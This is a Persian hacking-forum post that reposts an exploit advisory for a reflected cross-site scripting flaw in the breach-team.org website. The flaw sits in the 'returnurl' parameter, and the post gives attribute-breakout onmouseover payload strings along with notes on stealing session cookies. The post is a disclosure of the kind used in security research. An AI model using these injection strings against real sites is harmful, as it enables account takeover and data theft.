پرش به


تصویر

Breach-Team Cross Site Scripting Vulnerability

انجمن هکران ناشناس اکسپلویت ها اسکریپت ها اکسپلویت Cross Site Scripting

  • موضوع قفل شده این موضوع قفل شده است
بدون پاسخ

#1 ارسالی 25 ژانویه 2018 - 12:36

GoodBye Hack
+7,222
    OFFLINE
    تاریخ عضویت :
    24 فوریه 2015
  • مدیر کل
  • Leaders
  • 1,924 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : Black

کشف آسیب پذیری Xss از سایت امنیتی رخنه

https://cxsecurity.com/issue/WLB-2018010259
# Exploit Title: Breach-Team Cross Site Scripting Vulnerability
# Google Dork: N/A
# Date: 2018-01-24
# Exploit Author: Iran.Anonymous
# Vendor Homepage: https://breach-team.org/
# Tested on: Windows
***************************************
# vulnerability :

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

# Attack details :

URL encoded POST input { returnurl } was set to :

https://breach-team.org/favicon.ico"onmouseover=EHfS(9900)"

URI was set to "onmouseover='PCJf(9713)'bad="

URI was set to "onmouseover='fPUa(9349)'bad="

# The input is reflected inside a tag parameter between double quotes.

# Proof :

goo.gl/42EXyX


***************************************
# Thanks to : ~~> MR.Khatar || Turk.Khan || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY

# Discovered By: K4an

Capture.PNG


(-_-)We Are Anonymous(-_-)IM Black.Sec
 

16_cosso.png

 

:excl: به هیچ عنوان به صورت پیام خصوصی به سوالات شما پاسخ داده نخواهد شد :excl:

 

 






همچنین به انجمن هکران ناشناس, اکسپلویت ها, اسکریپت ها, اکسپلویت, Cross Site Scripting نیز برچسب خورده است

3 کاربر در حال خواندن این موضوع است

0 کاربر، 3 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP